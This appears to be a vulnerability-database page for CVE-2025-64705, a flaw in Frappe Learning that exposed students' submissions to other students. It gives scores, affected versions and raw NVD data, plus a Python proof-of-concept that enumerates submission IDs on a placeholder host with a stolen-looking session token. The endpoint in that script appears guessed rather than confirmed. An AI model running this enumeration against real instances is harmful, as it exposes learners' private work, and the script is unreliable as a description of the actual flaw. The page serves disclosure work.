Security Vulnerability Report
CVE-2025-64705 CVSS 4.3 MEDIUM

CVE-2025-64705

Published: 2025-11-12 23:15:40
Last Modified: 2025-11-17 19:21:32

Description

Frappe Learning is a learning system that helps users structure their content. Starting in version 2.0.0 and prior to version 2.41.0, users were able to access the submissions made by other students. The issue has been fixed in version 2.41.0 by ensuring proper roles and redirecting if accessed via direct URL.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:frappe:learning:*:*:*:*:*:*:*:* - VULNERABLE
Frappe Learning (LMS) >= 2.0.0
Frappe Learning (LMS) < 2.41.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-64705 PoC - Frappe Learning Unauthorized Submission Access
# This PoC demonstrates accessing another student's submissions via direct URL
import requests
import sys

TARGET_URL = "https://vulnerable-instance.com"
ATTACKER_TOKEN = "attacker_session_token_here"


def exploit_unauthorized_access():
    """
    Attacker with low-privilege account attempts to access other students'
    submissions by manipulating submission IDs in the URL parameter.
    """
    headers = {
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
        "Content-Type": "application/json"
    }

    # Try to access submissions of other students by iterating through submission IDs
    for submission_id in range(1, 100):
        url = f"{TARGET_URL}/api/method/frappe.lms.api.get_submission?submission_id={submission_id}"
        try:
            response = requests.get(url, headers=headers, timeout=10)
            # Check if unauthorized access is successful
            if response.status_code == 200:
                data = response.json()
                if "message" in data and "content" in data["message"]:
                    print(f"[!] Successfully accessed submission ID: {submission_id}")
                    print(f"[+] Submission content: {data['message']['content']}")
                    return True
        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {e}")
            continue
    return False


if __name__ == "__main__":
    print("CVE-2025-64705 PoC - Frappe Learning Unauthorized Submission Access")
    print("=" * 70)
    if exploit_unauthorized_access():
        print("[+] Vulnerability confirmed!")
    else:
        print("[-] Exploitation failed or target not vulnerable.")
```

References

https://github.com/frappe/lms/security/advisories/GHSA-qrvv-6g7r-g3v8 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64705", "sourceIdentifier": "[email protected]", "published": "2025-11-12T23:15:39.983", "lastModified": "2025-11-17T19:21:31.943", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Frappe Learning is a learning system that helps users structure their content. Starting in version 2.0.0 and prior to version 2.41.0, users were able to access the submissions made by other students The issue has been fixed in version 2.41.0 by ensuring proper roles and redirecting if accessed via direct URL."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frappe:learning:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.41.0", "matchCriteriaId": "AFC84D34-76E4-4F11-BEA1-90F3D3C35B92"}]}]}], "references": [{"url": "https://github.com/frappe/lms/security/advisories/GHSA-qrvv-6g7r-g3v8", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}